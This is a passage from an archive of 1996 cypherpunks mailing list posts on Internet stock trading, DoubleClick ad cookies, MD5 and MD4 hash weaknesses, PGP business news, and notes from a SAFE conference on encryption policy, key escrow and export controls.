-----END PRIVACY-ENHANCED MESSAGE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Date: Tue, 2 Jul 1996 03:31:43 +0800
To: cypherpunks@toad.com
Subject: SEC lets California retailer trade stock on Internet
Message-ID: <9607011502.AA20760@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


                    
         WASHINGTON, June 27 (Reuter) - A California company that  
sells energy-saving solar panels has received Securities and 
Exchange Commission approval to trade its stock over the 
Internet, extending the boundaries of off-exchange trading 
into cyberspace. 
         The approval, the first the SEC has issued on stock  
trading over the Internet, was given earlier this week to 
Ukiah, Calif.-based Real Goods Trading Corp., through a ``no 
action'' letter. 
         In such a letter, the SEC allows a petitioning company to  
perform what it requested to do, without fear of any 
enforcement action. In approving Real Goods' request, however, 
the agency imposed conditions in the interest of investor 
protection. 
         John Schaeffer, president, chief executive and founder of  
the company said in an interview he hoped to get the new 
system operational ``within a couple of weeks.'' 
         Schaeffer said that since 1991, his company has sold $4.6  
million of its company's stock to the public through direct, 
small offerings and without having to pay fees to investment 
bankers. 
         ``The 'off the grid' trading of our stock is a logical  
extension of our service to our customers, who will now be 
able to buy and sell our security without going through a 
broker,'' Schaeffer said. 
         ``This is also consistent with our mission of creating  
independent energy alternatives for our customers,'' he added. 
         Real Goods is currently traded thinly on the Pacific Stock  
Exchange, at a price range of between $5 to $7 in 1995. The 
stock closed at $7.25 on June 26. 
         In its application, the company said its system would  
function as a passive Internet bulletin board that will 
provide the names, addresses, including E-mail, and phone 
numbers of interested buyers and sellers and number of shares 
offered for sale or desired to be purchased. 
         Those participating may transmit the information through  
the company's World Wide Web site or by telephone, fax, mail 
or E-mail. Real Goods will then enter the data into the 
system. 
         Real Goods posted a loss of $175,000 last year on sales of  
$15.3 million, Schaeffer said. 
         ``We expect to be profitable this year,'' he said, adding he  
estimates sales to climb to about $20 million. 
         Earlier this year, the SEC permitted Spring Street Brewery  
Co., of New York, to make an initial public offering over the 
Internet. The agency asked the company to suspend trading, 
pending review of legal implications of such a trading system. 
         Spring Street subsequently said it planned to establish an  
online stock exchange through a unit. 
                

_______________________
Regards,            Democracy is where you can say what you think 
                    even if you don't think. -
Joseph  Reagle      http://rpcp.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 2 Jul 1996 05:46:29 +0800
To: "Mark O. Aldrich" <maldrich@grci.com>
Subject: Re: crypto and bagpipes [NOISE]
In-Reply-To: <Pine.SCO.3.93.960630142047.4081D-100000@grctechs.va.grci.com>
Message-ID: <Pine.LNX.3.93.960701111249.4556A-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 30 Jun 1996, Mark O. Aldrich wrote:
> 
> Can this be the end of civilization as we know it?
> 

	What is this civilization thing people keep talking about, and how
could _anything_ relating to bagpipes be remotely civil?

crypto tie-in: If you steno a voice message into bagpipe music, would
anyone be able to stand it long enough to extract the message? 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Tue, 2 Jul 1996 07:15:33 +0800
To: "'cypherpunks@toad.com>
Subject: FW: "CyberPayment Infrastructure"
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-960701181920Z-36004@tide19.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain



>----------
>From: 	Dick Moores[SMTP:rdm@netcom.com]
>Sent: 	Sunday, June 30, 1996 2:13 PM
>To: 	SEASIGI
>Subject: 	"CyberPayment Infrastructure"
>
>"CyberPayment Infrastructure" is the title of a new article from the
>Journal of Online Law.  I have an email subscription, but there's also
>a
>web site, http://www.wm.edu/law/publications/jol .  The new article
>should be on the web site soon, but if it's not, I'll send it to anyone
>who asks.  It's about 20k.  Here's the abstract:
>
>                           {Article 6}
>
>                   CyberPayment Infrastructure
>                  Henry H. Perritt, Jr. [NOTE 1]
>
>                  [Cite as Henry H. Perritt, Jr.,
>                  "CyberPayment Infrastructure,"
>                1996 J. Online L. art. 6, par. ___]
>
>Abstract
>
>{par. 1} An essential requisite for commerce on the Internet
>is the existence of a reliable and secure system to handle
>payment for goods and services purchased. The basic
>technology for such systems is public key encryption.
>Professor Perritt explains how this technology can be used
>to create a variety of "payment infrastructures." Any
>payment system must meet certain requirements: merchants can
>depend on it to be paid; consumers have access to the means
>of payment through intermediaries like "certificate
>authorities;" these intermediaries understand their
>responsibilities and risks; and existing financial
>institutions understand their responsibilities in the world
>of non-paper-based financial instruments. Much of what is
>necessary can be accomplished within today's legal framework
>without need of new laws.
>
>-----------------------------------------------------------------
>
>Dick Moores  rdm@netcom.com
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Dierks <tim@dierks.org>
Date: Tue, 2 Jul 1996 07:28:48 +0800
To: Scott Wyant <scott_wyant@loop.com>
Subject: Re: [Fwd: Doubleclick]
Message-ID: <v02140b00adfdc26f651b@[206.167.202.83]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:24 AM 7/1/96, Scott Wyant wrote:
>At 12:43 PM 6/30/96 -0700, jon@aggroup.com wrote:
>>> > >From:    Scott Wyant <scott_wyant@loop.com> Subject: COMMENT:
>>> > >
>>> > >If you're like me, you never went to a site called "doubleclick."
>>> > >So how did they give you a cookie?  After all, the idea of the
>>> > >cookie, according to the specs published by Netscape, is to make a
>>> > >more efficient connection between the server the delivers the
>>> > >cookie and the client machine which receives it.
>>> > >But we have never connected to "doubleclick."
>>
>>Scott must have. Navigator is very picky about where a cookie comes
>>from and what is put in the domain field of the cookie.
>
>Nope.  I'm afraid your information is incorrect here.  I've also watched
>other sites hand me a double-click cookie.

The way doubleclick works is that the sites who contract with them to sell
advertising space insert a URL into their page which fetches the
doubleclick ad banner. For example, the guys at TroutHeads, Inc.
(www.troutheads.com) would insert an HTML IMAGE tag with an HREF referring
to ad.doubleclick.net; that then results in _your_ browser doing an HTTP
transaction with ad.doubleclick.net; doubleclick can then hand you all the
cookies it wants.

Anytime you fetch an image, you're visiting a site, and because it's
automatic, you can easily visit a lot of sites you never knew you were
going to.

>From <URL:http://www.doubleclick.net/web_sites/htmlchange.htm>:

For any HTML document you wish to display an ad banner for, simply add the
following
     HTML tags:

     <CENTER><A HREF="http://ad.doubleclick.net/jump/MY_URL">
     <IMG SRC="http://ad.doubleclick.net/ad/MY_URL" WIDTH=468 HEIGHT=60
     ISMAP></A>
     <BR><FONT SIZE="2">Click on graphic to find out more!</FONT></CENTER>

     Where MY_URL is the URL for the HTML document displaying the ad banner. For
     example:

     <CENTER><A
     HREF="http://ad.doubleclick.net/jump/www.iaf.net/htmlchange.htm">
     <IMG SRC="http://ad.doubleclick.net/ad/www.iaf.net/htmlchange.htm"
     WIDTH=468 HEIGHT=60 ISMAP></A>
     <BR><FONT SIZE="2">Click on graphic to find out more!</FONT></CENTER>

 - Tim

Tim Dierks - Software Haruspex - tim@dierks.org

"...when ketchup finally comes out of the bottle, it is going a good 25 miles a
year.... It rolls along at three-thousandths of a mile an hour. Heinz knows the
speed because it has a device called a Bostwickometer, a chutelike contraption
that calculates the speed at which ketchup travels."
 - The New York Times, June 12, 1996






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Tue, 2 Jul 1996 07:14:20 +0800
To: cypherpunks@toad.com
Subject: PGP Inc. buys ViaCrypt (was: Zimmerman/ViaCrypt?)
In-Reply-To: <0PggPD7w165w@Garg.Campbell.CA.US>
Message-ID: <4r95j8$db6@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <0PggPD7w165w@Garg.Campbell.CA.US>,
Edgar Swank  <edgar@Garg.Campbell.CA.US> wrote:
>Phil disagrees with ViaCrypts new "business" version of PGP which
>apparently encrypts all messages with an employer-supplied public key
>in addition to any specified by the employee.  ViaCrypt has their side
>of the argument on their web page.
>
>   http://www.viacrypt.com/
>
>The basis of the possible lawsuit would be that ViaCrypt violated
>their agreement not to put any "back door" into any product with the
>PGP name. Whether the "business version feature" could be defined as a
>"back door" would be the crux of the argument.
>
Muppet news flash:

I'm listening to the SAFE conference live by RealAudio, and Zimmerman just
announced that on Friday, PGP Inc. bought ViaCrypt.  He didn't give any
more details.

   - Ian

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMdgZikZRiTErSPb1AQExbgP+KYhxBQ8iBs73tQXsmcUezXMznkG88q2E
+8G6tqzml5sX3DYsss3rDL/Le2a6RRZjYwOnjpnhjWdCPUIKsXE6s41XaaBhSN0f
RaJnYWp+rMPdSMRvHsQQahg25WdGdSYgnHBW46NMGDoBbOG8EN9/Cn0lnIRIfXE6
dP4BCMzoBjw=
=nwDn
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <alex@crawfish.suba.com>
Date: Tue, 2 Jul 1996 05:27:33 +0800
To: cypherpunks@toad.com
Subject: Sameer got plugged on C-SPAN
Message-ID: <199607011632.LAA07025@crawfish.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


Janlori Goldman, at the Center for Democracy & Technology, just mentioned
Sameer's anonymizer on C-SPAN during a segment of Internet privacy.

They showed a shot of the screen and everything.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David F. Ogren" <ogren@cris.com>
Date: Tue, 2 Jul 1996 04:01:46 +0800
To: ogren@cris.com
Subject: Re: rsync and md4 (my final comments)
Message-ID: <199607011536.LAA26258@darius.cris.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> 
> "David F. Ogren" writes:
> > I stand by my statements.
> 
> Then you have lost all your reputation with me. If you don't even have
> the integrity to admit that you are wrong, you are obviously not a
> reasonable source of information.
> 

At this point, I can see that we have agreed to disagree.  Mr. Watt has 
kindly quoted the exact text from Dobbertin, which I did not have handy.  
Let the readers of this list decide for themselves in regards to the 
security of MD5.

But I wanted to make two last comments before this thread (finally!) dies.

1. I think that you will agree that MD4 will work fine for Mr. Tridgell's 
program, irregardless of your criticisms.  He specifically stated that he 
was not concerned about intentional collisions, only random ones.

2.
(quoted from Mr. Perry in an article entitled "MD5 breaks, etc.")

>   checked. However, the result is widely known. MD5 is *not*
>   something that should be trusted going forward, and I hope the next
>   version of PGP uses SHA-1.

As I understand the current plans, PGP 3.0 _will_ incorporate a SHA option. 
In fact, I believe that there may already be "bootleg" versions that 
incorporate SHA.


- --
David F. Ogren                | 
ogren@concentric.net          | "A man without religion is like a fish
PGP Key ID: 0x6458EB29        |  without a bicycle"
- ------------------------------|----------------------------------------
Don't know what PGP is?       | Need my public key?  It's available
Send a message to me with the | by server or by sending me a message
subject GETPGPINFO            | with the subject GETPGPKEY
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMdfvtuSLhCBkWOspAQGkQwf5AQTJbqJ7YQOCSaLWK7qjn0Fr0AzF9Cyb
Bd2WJcHisQZ4WxwPy41SF3uUNXvgyES11rfvqa7SoqDU1QuO4N3I8PZ5+zrlwDpI
2Yb/wHyQ2jPtCVSWCmoyZfbw7a9086wWbg+N4IDuefPdgI+SqNiYmQnEsrh1+f9T
L2/gC6GLXFHtl68guYTGjI3XIgHcILWkqjuo19rzw+4NXAQ3kPxTaBLGcxuMYEPl
E5IbuKZ3mN4CZIDTSSctr78cthsr79KgW5NwlBW5AcCkU1XnhALVTN0vNEf2tILN
jl0BdVALNbkyFdTAE7/5z6pDcThgKR/68cRrTBTRFlq1WAadXAKV8w==
=drZ2
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 2 Jul 1996 04:39:32 +0800
To: "John Hemming - CEO MarketNet" <johnhemming@mkn.co.uk>
Subject: Re: MD5 breaks, etc.
In-Reply-To: <1996-Jul01-150540.1>
Message-ID: <199607011553.LAA21151@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"John Hemming - CEO MarketNet" writes:
> Accepting for a moment that MD5 collisions have been identified.  From
> a commercial aspect I am concerned to ensure the cryptographic security
> of our ECheque system.
[...]
> Just a thought on the use of MD5.  If two signatures are appended to the
> same document both using MD5, but one either
> 
>   a) Signing all but the last octet of the message  ... or
>   b) Signing the whole of the message and signature.
> 
> Would that not make the determination of useable collisions either
> impracticable or impossible?

Wouldn't it be easier to move to SHA-1?

> Alternately, could someone please point me at the SHA algorithm.

I believe SHA-1 (note-- you want the updated version!) is in the
latest edition of Schneier, or at least is referenced there.

BTW, you are going to have to assume if you are doing real world
business that you will be upgrading your algorithms every few years
until the end of your application's lifespan.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 2 Jul 1996 06:07:38 +0800
To: "David F. Ogren" <ogren@cris.com>
Subject: Re: rsync and md4 (my final comments)
In-Reply-To: <199607011536.LAA26258@darius.cris.com>
Message-ID: <199607011647.MAA21252@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"David F. Ogren" writes:
> 1. I think that you will agree that MD4 will work fine for Mr. Tridgell's 
> program, irregardless of your criticisms.  He specifically stated that he 
> was not concerned about intentional collisions, only random ones.

If one is concerned about speed and doesn't need a cryptographic
checksum, a long CRC will be far, far faster and will do fine.

As soon as one starts talking about using cryptographic checksums,
there is no point in using them unless one really wants the
cryptographic protection.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David F. Ogren" <ogren@cris.com>
Date: Tue, 2 Jul 1996 06:32:05 +0800
To: watt@sware.com
Subject: Re: rsync and md4
Message-ID: <199607011700.NAA19537@darius.cris.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> Look the point is that Ogren seems to think this is some sort of a
> minor technicality and that we can safely ignore it most of the
> time. Thats simply not prudent. Once you find that the key properties
> of your cryptographic hash have fallen and you have to be
> exceptionally careful about what you put through the hash lest an
> attacker somehow influence it, you've lost the game. MD5 is no longer
> trustworthy. I agree that one needn't run screaming in the streets,
> but Ogren made it sound as though this wasn't a matter of
> concern. Thats simply wrong. Saying that leads people to a completely
> incorrect conclusion.

And I told myself I wouldn't respond to this thread anymore.  Oh well.  I 
just don't want to be misinterpreted.

I never meant to imply (and don't think that I did), that the attacks 
against MD5 were insignificant.  As I said, I'm moving to SHA in any 
software I develop from now on.

What I said was the attacks were insignificant in the application being 
considered (rsync) and that MD5 was not completely broken.  Come on, all 
the guy wanted was a fast 128 bit checksum.

For example, I am still using PGP clearsigning which, of course, uses MD5. 
Dobbertin indicates that his attack cannot be used against me as long as I 
only sign messages that I create myself.  Yes, PGP would work better with 
SHA.  I'd be able to sign documents that others created with (more) 
certainty.  But that doesn't mean that I should stop using PGP.


P.S. I apologize to the list for flooding this list recently.  
Unfortunately, I took it a little too personally when Perry told me to 
"stop spewing inaccurate information" and to "quit posting".  It was late, 
and I let him bait me more than I ordinarily would.

Now I find myself running in circles trying to make sure that I've made 
myself clear and that no one else (other than Perry) is misintepreting what 
I'm saying.
- --
David F. Ogren                | 
ogren@concentric.net          | "A man without religion is like a fish
PGP Key ID: 0x6458EB29        |  without a bicycle"
- ------------------------------|----------------------------------------
Don't know what PGP is?       | Need my public key?  It's available
Send a message to me with the | by server or by sending me a message
subject GETPGPINFO            | with the subject GETPGPKEY
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMdgDbuSLhCBkWOspAQGPeQf/QJB109Gjd3s/ALodykZgH0S6FCs3wHK7
OiTUpxBF5lwojhBSrz7ej1RnAW+Uq5Lcz/GyWqH6rvYPPI1uZ3023UAV3nqH8qXY
nnznPfvTkUQgSjaQu/YRvWlTWwrNsW/KIR6iVbwVDnbUnvuAjUJskWyAg1Wz4zIV
8PV8RnrHSTT06j5LrCtiD0eWr/NgmpgIFS5+ID5z9/ikMV6xF4zSrlubELFFJUUT
M3nZWDlr7SaU0hFLQt3yu6oSqAjKSGrPsU1QCJ/Y1zdS49R/cLIzOzbQ42R1Cyot
hMnAayTqNdUI/goa2WAbda3gYpRodTA2GpciNj7u3xs0Ik/1TIEqlw==
=4x7D
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@ATHENA.MIT.EDU>
Date: Tue, 2 Jul 1996 07:10:22 +0800
To: Yap Remailer <x@x.x>
Subject: Re: MacPGP 2.6.3 released
In-Reply-To: <199607010634.XAA23399@yap.pactitle.com>
Message-ID: <199607011808.OAA03374@charon.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> > ...PGPlib (as I said, there is no PGP 3.0) will have full 2.6
> > support.  So, I don't know where you heard this, but I would
> > recommend you verify your information with people close to the
> > project before spreading more FUD around.
> > 
> > Enjoy!
> 
> Where do I get PGPlib?  An Altavista search of PGPlib turned up
> nothing, and it's not on net-dist.mit.edu, which I thought was the
> canonical distribution point?

If you read closely, you will notice that I said "will", which is in
the future tense.  PGPlib has not been released, yet.  But it will.
And I will most assuredly let you know when it is released.  Until
then, however, my time is better spent implementing than responding to
email like this.  So, thanks for making me lose my concentration and
my place in my code so I could reply to your message.

Enjoy!

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John Hemming - CEO MarketNet"  <johnhemming@mkn.co.uk>
Date: Tue, 2 Jul 1996 05:01:24 +0800
To: cypherpunks@toad.com
Subject: MD5 breaks, etc.
Message-ID: <1996-Jul01-150540.1>
MIME-Version: 1.0
Content-Type: text/plain


Accepting for a moment that MD5 collisions have been identified.  From
a commercial aspect I am concerned to ensure the cryptographic security
of our ECheque system.

Just a thought on the use of MD5.  If two signatures are appended to the
same document both using MD5, but one either

  a) Signing all but the last octet of the message  ... or
  b) Signing the whole of the message and signature.

Would that not make the determination of useable collisions either
impracticable or impossible?

I must admit I am inclined to encode additionally the key components
of the message (amount paid, to whom) as well as the hash using a
Private Key encryption.  After all we have at least 60 octets of 
important data that can be encoded in this manner using one
simple encryption sequence, this can cover account credited and 
amount easily.  If someone can collision codge the description I am
not desperately concerned.

Alternately, could someone please point me at the SHA algorithm.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Seth I. Rich" <seth@hygnet.com>
Date: Tue, 2 Jul 1996 09:21:21 +0800
To: scott_wyant@loop.com (Scott Wyant)
Subject: Re: [Fwd: Doubleclick]
In-Reply-To: <1.5.4.32.19960701172423.006cd9e8@pop.loop.com>
Message-ID: <199607012117.RAA08803@arkady.hygnet.com>
MIME-Version: 1.0
Content-Type: text/plain


> >> > >If you're like me, you never went to a site called "doubleclick."  
> >> > >So how did they give you a cookie?  After all, the idea of the 
> >> > >cookie, according to the specs published by Netscape, is to make a 
> >> > >more efficient connection between the server the delivers the 
> >> > >cookie and the client machine which receives it. 
> >> > >But we have never connected to "doubleclick." 

You probably loaded a banner ad from doubleclick -- and downloading the
inline image from their site is sufficient for the cookie transfer to
take place.

Seth
---------------------------------------------------------------------------
Seth I. Rich - seth@hygnet.com            "Info-Puritan elitist crapola!!"
Systems Administrator / Webmaster, HYGNet             (pbeilard@direct.ca)
Rabbits on walls, no problem.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: minow@apple.com (Martin Minow)
Date: Tue, 2 Jul 1996 13:31:40 +0800
To: cypherpunks@toad.com
Subject: Notes from SAFE meeting
Message-ID: <v02140b01adfe2083f1d8@[17.219.102.1]>
MIME-Version: 1.0
Content-Type: text/plain


Here are my raw, unedited, incomplete, and not to be trusted,
notes from the SAFE meeting, July 1, 1996, at Stanford.
(ps. thanks to the folk who did an amazing amount of work
to put this on.)

burns: fbi, cia, nsa presented to senate/congress: said nothing that wasn't
already in public record (newspapers)

telia (Swedish Telecom) representative (Mattias Soederholm) -- can't import
strong encryption as NSA claims it would harass company. doesn't like having
to tell customers that USA will read their mail.

Whit Diffie - nuclear non-proliferation: proliferation of crypto does
more good than harm: make sure that weapons are under your control: extensive
development since Kennedy administration. Positive control over nuclear
weapon: crypto.

----
Technical panel
----
whit diffie, eric thompson (forced decryption, fbi is a client), bruce
schneier, tom parenty (sybase), matt blaze. We came to discuss policics,
but were charged with discussing technology.

key lengths -- too much jargon. question is work factor: how much work
to break system. public keys used only for signatures; actual encryption
uses "normal" crypto. 40 bits == 2^40 operations to get a key. First:
two different points of view: security officer: every message must be
secure, even against strong opponent. intelligence agency wants to read
every message. 30, 60, 90, 120. 2^30 == one billion. any pc can recover
any key. billion billion == des. very clear that can do it, not easy,
however. 90 bits billion billion billion. won't be do-able in lifetime
of business personal data. 120 bits can't be do-able in forseeable future.

but, point of view of an intercept organization; meet in the middle? won't
satisfy either party's interest. 40 bit can be exported. last year, demonstrated
that can break 40 bit keys. Takes on order of few weeks to a month of Sun
workstations. intercept device spends most of its time deciding whether to
record data. has a fraction of a second to look at a message, 40 bits too
large for intercept on that basis.

eric thompson. access data. cryptanalysis -- break codes, build hardware
to aid in this. specialize in defining parts and pieces to break e.g., rc40
amd2905 chips on a board breaks in $8,400 engineering cost. Sell under $20,000.
little company, not well-funded government agency.

des fpga about $1M/7 days per key. off the shelf design using 5 year old chips.
what's realistic to expect the nsa, fbi can do?

bruce schneier: foreign crypto. is it any good? yes. more done outside usa
than inside. many countries asia, europe, pacific have strong groups. algorithm
conferences: 90% of papers from outside usa. hard to get funding in usa.
more academic research overseas. products with more options. here, products
are hamstrung by baggage: key length, escrow. other countries can write without
restrictions. best products from former yugoslavian folk working in swedish
university.  usa corp's cant compete: no talent, government restrictions. losing
our share of research, developement, products. as internet becomes ubiquitious,
we lose market share. restrictions won't stop, will only hurt us.

tom parenty; worked for NSA: "in God we trust, the rest we monitor."
key escrow ineffective. can today buy over 500 products from 60 countries.
no usa monopoly. www.cypto.com home page; list of pointers for our favorite
foreign crypto products (for some value of "our" and some value of "favorite.")
crypto controls don't keep crypto out of child pronographer hands. keeps out
of hands of legitimate individuals and corporations. criminal, terrorist, can
layer foreign crypto on anything usa gov't does. will give protection.

moral equiv of wiretaps? no! criminals: criminals talk to criminals, criminals
talk to rest of world. crim to crim: use strong crypto. crim to airline,
car rental, hotel: can go to airline etc. and subpeona their records:
crypto buys nothing for wiretap.

solve crimes, prevent crimes? would key escrow prevent oklahoma bombing?
but without strong crypto, foreigner working outside usa can take plane down,
grab medical records. etc., by hacking insecure networks.

matt blaze: key escrow. ignore politics; doesn't make technical sense.
fundamental flaws software engineering can't technically solve in a
sensible way. first: enormous increase of engineering complexity.
difficult to design even simply secure (alice, bob, eve + detective
dorothy) system engineering. key escrow makes this even more difficult.
engineering problem is too complex. classified world not far ahead of
unclassified: blaze discovered protocol failure in clipper chip design --
can circumvent escrow field, can forge messages. reason failures occur
not because nsa incompetent, but because problem is extremely difficult.

second fundamental problem: operating key escrow center economically and
technically difficult. 24/7/365, 2 hour response to law enforcement request.

key escrow doesn't distinguish between comm key, data storage keys, and
signature keys. releasing latter may be devistating.

---
diffie: if you collect data; it will be used (census data used to round
up Japanese in California, Jews in Germany, Holland, Denmark).

schneier: data harvesting: insurance company wants to know who filled
perscription for AZT. crpyto prevents against non-invasive attack; not
against fbi entering house to install bugs.

diffie: crypto requirements of bad people: terrorists need tight-knit,
unified in purpose. tools to secure communication are readily available
"closed crypto." ordinary folk need open crypto; delayed by government
restrictions.

---
legal issues:

ken bass: counsel for telecom policy:
national security? non-escrowed strong encryption? balance? costs? what are
they, what do we lose? escrow born by nsa mission. didn't hear law enforcement
concerns initially; now nsa stands behind shield of fbi. nsa/fbi has created
arms race among cryptographers. most people would have been happy with des,
which nsa can probably break, but not others. nsa discovered it was doing
itself great damage by pursuing export controls: but biggest danger to
nsa is explosion of protocols, routings, etc. nsa wants to read everything
to see what it wants to look at. fbi, however, knows what it wants to see.
nsa knows that crypto puts it out of business. nsa needs to preserve
fiction of crypto (i.e, that they can read, but you think they can't).
fbi wants to preserve status quo. law enforcement can't undertake survelience
until it knows who the target is. don't need crypto to find crooks. needed
only after you know who the crooks are. fbi foolish to try to convince us
that crypto (escrow) is golden bullet of law enforcement. why does fbi
need to have crypto to monitor people for whom they already have probable
cause (that they need in order to get warrant to wiretap).

jim lucire: americans for tax reform. IRS doesn't follow constitutional
protections.

barry steinhardt (ACLU). law enforcement concerned to preserve its
wiretap capability. wiretap happy administration. set records for number
of wiretaps (both in criminal and national security). law requiring wiretap
capability in telecom infrastructure. additional crimes where wiretap
allowed. Janet Reno: four challenges  -- threat that encryption poses to
law enforcement; ability to search for stored information. wiretapping.
why does aclu find it so odious. fourth amendement "particularized
suspicion" -- government must have a reason to search you. wiretapping
is a "generalized search." in 1970's, 50% of wiretaps produced useful
information. now 17% reveal useful info. warrant to search 100 homes to
find criminal info in 17 homes? ability to continue wiretapping is in
question. what is cost to individuals who are wiretapped?

cindy cohn, lawyer: export problems with ITAR: scientists lose. bernstein
case (can export crypto research): export rules squelch discussion and
reseach: first amendment; right of people to talk about science, art,
literature; not just politics. broadness: IATR is overlly broad. defines
export to prevent publication. prevents export to "ordinary" people, but
only intended to prevent export to terrorist. procedural problems: no
hard boundaries.

barbara simons (acm) -- copyright? net community suprised when CDA
was passed. major voices heard are those of lobbiests; not technology
focus; focussed only on their lobby-needs. monitor net? only to
preserve copyright. goals will work only if you shut down the net.
copyright legislation makes illegal to manufacture device to violate
copyright (camera? vcr?)

john gilmore (eff): can we trust the courts? won't be won on a single
front: need to keep pressure up. "for purposes of first amendment
analysis, court finds that source code is speech." will go to supreme
court. need help from legislature. want to bring light into export
control process. want to have clear rules so you can read rules, build
product and export it.

michael froomkin (law school, univ of miami): legal status of privacy?
can't count on courts. don't take wait and see attitude. wiretap still
has some value. Legal status of no export has been successful: no strong
crypto in w/95.

ken bass question: froomkin: crypto is a constitutional right (200 pages).
very few nsa cases; mostly 4th amendment ('drug exception to constituion).
korn case, bernstein case. briefs in cases required reading for congress
(first amendment). crypto useful to protect free speech (Phil Zimmerman
talked about human rights people in Burma who use PGP to protect their
messages from government.)

[representative zoe lofgren (Dem CA) -- someone proposed 4th amendment
in congressional debate amending criminal law. Defeated on party lines.]

implication for information sharing between cia/fbi/nsa with foreign
intelligence agency? guatamala tragedy example of problem.

the dumb criminal theory? blow up buildings with trucks they rent in
their own names.

--- With apologies for incoherence, errors, and incompleteness ---

Martin Minow
minow@apple.com









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Tue, 2 Jul 1996 10:54:17 +0800
To: jya@pipeline.com (John Young)
Subject: Re: Technology and Privacy
Message-ID: <v01510117adfe0a90b7e1@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain


The June 11 letter was from Jack King, a quite clueful and thoughtful D.C.
attorney who has been diligent in tracking the war on (some) drugs. Hardly
an alarmist.

Why can't I quite bring myself to trust "Barrie A. Vernon?"

-Declan



>   The Washington Post, July 1, 1996, p. A16.
>
>
>   Technology and Privacy [Letter]
>
>
>   In reference to the May 31 editorial "Plant Lights and
>   Privacy" commenting on an 11th Circuit Court of Appeals
>   decision to uphold the use of thermal imaging in cases
>   involving indoor marijuana growing operations: The U.S.
>   Supreme Court had just declined to review that 11th Circuit
>   decision.
>
>   On June 11, The Post published a letter from Jack King
>   ["When Government Can Look Through Walls"] warning us that
>   thermal imaging, as developed by the military and as used
>   by civilian law enforcement agencies with the cooperation
>   of the military, posed an Orwellian threat to citizens
>   because the government could use the technology to tell if
>   two people were making love in the privacy of their
>   bedroom.
>
>   To set the record straight, military thermal imaging is
>   used to support civilian law enforcement only after other
>   probable cause for a search warrant, such as power bills,
>   observation of boarded-up windows, vents on the roof to
>   draw away heat and buys by confidential informants, are
>   documented. The military is then called in, using thermal
>   imagers, to determine if there is an unusual heat source in
>   the house as detected by heat escaping from the house. In
>   dozens of cases where thermal imaging was used, I have not
>   observed one case where it could detect the activity of
>   people in a house, let alone a bedroom. I also have not
>   observed the technology to have the ability to detect what
>   people are doing in any room behind closed doors, covered
>   windows and walls other than to detect blurs or shadows
>   moving around behind light curtains.
>
>   The United States v. Cusumano language quoted by Mr. King
>   was reversed last month by the court because the original
>   three judges decided it was an issue that didn't need
>   deciding, i.e. the constitutionality of thermal imaging
>   absent a search warrant, and did not exercise "judicial
>   restraint."
>
>   The trend to Mr. King's "militarization" of the war on
>   drugs, based on a decision by then-secretary of defense
>   Richard Cheney that drug use represented a threat to our
>   national security, is being carried out with restraint,
>   respect for the law and an appropriate appreciation for the
>   privacy of our citizens.
>
>   Barrie A. Vernon
>   Alexandria
>   The writer is an attorney with the National Guard Bureau at
>   the Pentagon working in support of the counter-drug
>   directorate.
>
>   [End]
>
>
>
>
>
>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Tue, 2 Jul 1996 10:56:00 +0800
To: nelson@crynwr.com
Subject: Re: mocking paranoia
Message-ID: <199607012239.SAA25392@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 29 Jun 96 at 5:58, nelson@crynwr.com wrote:

> Earlier, someone mocked someone else for being paranoid.  Sorry, but
> this is a mistake.  By definition, you have a non-empty threat model
> when you set out to encrypt; therefore you must be paranoid to use
> encryption. [..]

